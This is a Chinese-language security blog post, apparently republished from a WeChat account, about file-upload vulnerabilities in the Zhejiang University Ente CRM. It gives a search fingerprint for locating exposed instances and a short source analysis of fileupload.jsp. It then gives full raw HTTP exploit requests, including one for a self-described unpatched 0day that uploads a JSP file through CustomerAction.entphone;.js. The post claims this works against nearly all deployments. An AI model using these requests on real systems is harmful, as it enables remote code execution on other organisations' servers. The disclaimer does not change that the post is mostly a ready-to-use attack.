0x01 技术文章仅供参考学习,请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。
0x02
指纹:title="欢迎使用浙大恩特客户资源管理系统"
0x03 源码分析
这个分析是之前爆出来的浅浅的分析一下吧,0day的在下面。(刚审了不到二个月就爆出来了不得不说有人在外网部署蜜罐白嫖day这一手做的真强,不太想大家被割韭菜还是写一下这个漏洞吧)
源码位置deploy/entsoft_en.war/entereditor/jsp/fileupload.jsp,特别好审计的一处上传,通过request.getInputStream()获取请求的输入流,然后获取了文件名 filename,之后就是上传后的输出路径。ps:厂家修复漏洞也是狠人,后续是直接把全代码中的fileupload.jsp文件全部删除了。
0x04 漏洞复现
数据包:
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=plugins.jsp HTTP/1.1Host: xxxxxxxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacqAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 81111
0x05 0day
字越少越严重不敢写源码分析直接给复现数据包(刚被爆出来目前基本上通杀)
POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacqAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2AContent-Length: 203------WebKitFormBoundarye8FPHsIAq9JN8j2AContent-Disposition: form-data; name="file";filename="as.jsp"Content-Type: image/jpeg<%out.print("test");%>------WebKitFormBoundarye8FPHsIAq9JN8j2A--
记得关注本公众号哦后续还会发布一些审计到的漏洞或者是一些在野漏洞,外网未暴露的漏洞。后续还会考虑建一个吹水聊天的微信群大家一起交流学习。冲冲冲冲
原文始发于微信公众号(Kokoxca安全):浙大恩特CRM文件上传0day(在野)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论